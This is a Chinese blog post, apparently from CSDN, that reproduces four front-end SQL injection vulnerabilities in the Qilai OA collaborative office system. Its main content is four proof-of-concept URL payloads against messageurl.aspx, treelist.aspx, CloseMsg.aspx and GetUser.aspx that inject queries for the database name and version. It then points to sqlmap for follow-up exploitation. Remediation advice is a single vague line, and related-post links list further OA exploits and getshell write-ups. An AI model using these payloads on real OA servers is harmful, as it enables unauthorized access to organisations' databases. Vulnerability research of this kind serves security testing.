启莱OA系统SQL注入复现渗透测试

最新推荐文章于 2025-03-29 21:23:40 发布
原创 最新推荐文章于 2025-03-29 21:23:40 发布 · 3.9k 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#渗透测试 #安全漏洞 #数据安全
启莱OA协同办公系统被发现存在4个SQL注入点,包括messageurl.aspx、treelist.aspx、CloseMsg.aspx和GetUser.aspx等页面。攻击者可通过构造特定URL触发漏洞,如POC1至POC4所示。若回显特定信息,则可能确认SQL注入存在。为修复此问题,建议设置拦截限制访问,并使用sqlmap等工具进行测试检查。请注意,非法使用可能产生法律风险。

简介

启莱OA的是协同OA办公系统,在多个领域均有应用。企业厂商暂不详,但被爆出前台存在4个sql注入点。

漏洞复现

使用url拼接一下路由
POC1

/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1

POC2

/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1

POC3

/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1

POC4

/client/GetUser.aspx?user=' and @@version>0--

如果回显如下 则可能存在sql注入

sql注入回显

后续可使用sqlmap进行测试检查

修复建议

设置拦截 限制访问

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
OA messageurl.aspx SQL注入
08-30 654
​子曰:“不患人之不己知,患不知人也。”
OA CloseMsg.aspx SQL注入
08-29 732
子贡曰:“贫而无谄,富而无骄,何如?”子曰:“可也。未若贫而乐,富而好礼者也。” 子贡曰:“《诗》云:‘如切如磋,如琢如磨。’其斯之谓与?”子曰:“赐也,始可与言《诗》已矣!告诸往而知来者也。”
OA treelist.aspx SQL注入
08-31 502
子曰:“为政以德,譬如北辰,居其所,而众星共之。”
蓝凌(Landray)OA漏洞常见RCE
heike_Ch的博客
05-09 2178
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0
SuperherRo的博客
08-29 2359
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.
SQL注入SQL injection)
l_010的博客
06-21 919
SQL注入SQL injection)
对某泛微OA的一次渗透测试_利用方式三
afei001
06-07 1254
后来才知道,是可以getshell的,看了表哥们的文章才知道,泛微对于堆叠查询做了过滤,过滤了;、--+等特殊字符。原来SQLserver堆叠注入并不需要;,所以SQLmap是无法直接--os-shell的。可惜当时并不知道不需要;就把洞交了。又少了好几个W。唉。
SQL Injection(SQL注入)介绍及SQL Injection攻击检测工具
热门推荐
周公(周金桥)的专栏
08-06 1万+
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望发大家思考,起到抛砖引玉的作用 一、SQL Injection的原理 SQL Injection的实现方法和破坏作用有很多,但万变不离其宗,其原理可以概括为一句话 :SQL Injection就是向服务器端提交事先
网络安全 - SQL Injection
最新发布
Hacker_LaoYi的博客
03-29 1136
给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)网络安全产业就像一个江湖,各色人等聚集。
SQL Injections及sqli-labs练习
weixin_54347738的博客
09-01 475
从数组中取值取出它的key,将值放入前端并写了html样式,若没取到,mysql会将报错打印,若最上面未使用get传参id,则会让你输入数字类型的id。①使用get传参,语句中传入的id,其实是users表中的id,id字段其实就类似于身份证编号是唯一可以区分用户的,如下图所示:使用id作为限制条件查出某个人:②将下图中的注释打开,即可得到我们查询到的数组的数据由上图可知,数组是以key取值的。
通达OA系统11.2漏洞
qq_50854662的博客
12-02 6065
以通达OA系统11.2版本为案例的Web渗透
OA办公系统自动渗透测试过程
战神/calmness的博客
02-26 469
毕业设计
记一次完整的渗透测试
LiuWang0314的博客
05-21 2700
目录前言掉坑起因(通达OA前台任意用户登录)掉坑过程一(上传webshell问题)掉坑过程二(cmdshell提权问题)如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 本次渗透测试过程大概是这样的:通达OA前台任意用户登录-上传webshell-获取相关信息-提权c
渗透测试面试常见问题
WWWFFFX的博客
03-25 1553
日志审计系统能够通过主被动结合的手段,实时且不间断的采集用户网络中不同厂商的安全设备,网络设备,主机,操作系统以及各种应用系统产生的海量日志信息,并将这些信息汇集到审计中心,进行集中化存储,备份,查询,审计,告警,响应,并出具丰富的报表报告,获悉全网的整体安全运行态势,同时满足等保关于安全管理中心的日志保存时间大于6个月的要求。产品主要部署在网站服务器的前方。通过特征提取和分块检索技术进行模式匹配来达到过滤,分析,校验网络请求包的目的,在保证正常网络应用功能的同时,隔绝或者阻断无效或者非法的攻击请求。
刚入门小黑客记一次对某站点的渗透测试(bypass)
kjuhfkicf154的博客
01-31 1951
渗透已授权。非授权渗透是违法行为!
记一次内网渗透测试实训总结
qq_36410265的博客
06-20 4953
时间很快就来到了学期的最后一个月,和上学期一样,最后的几周是实训周,而这次实训恰好就是我比较喜欢的网络攻防,因为之前学过相关的知识,做过一些靶场,相比于其他同学做起来要快些,不过内网渗透也还是头一次,得益于这次的内网渗透靶场环境,小小地体验了一下,期间也踩了许多坑,也陆陆续续地解决掉了。所以就以本篇文章做个总结,目的在于梳理所学到地知识点和分享。物理机 (win 10) ip:172.20.10.1工具:、攻击机(kali) ip:172.20.10.129工具:、、、、、 …靶场拓扑图首先需要拿到...
致翔OA漏洞学习——msglog.aspx SQL注入漏洞
记录并分享学习安全的知识点..
05-02 3141
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、概述 致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。注:注入参数为user。
OA系统漏洞记录
Aquarius_ego的博客
05-14 5373
OA系统介绍及相关漏洞(不断更新哦~)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值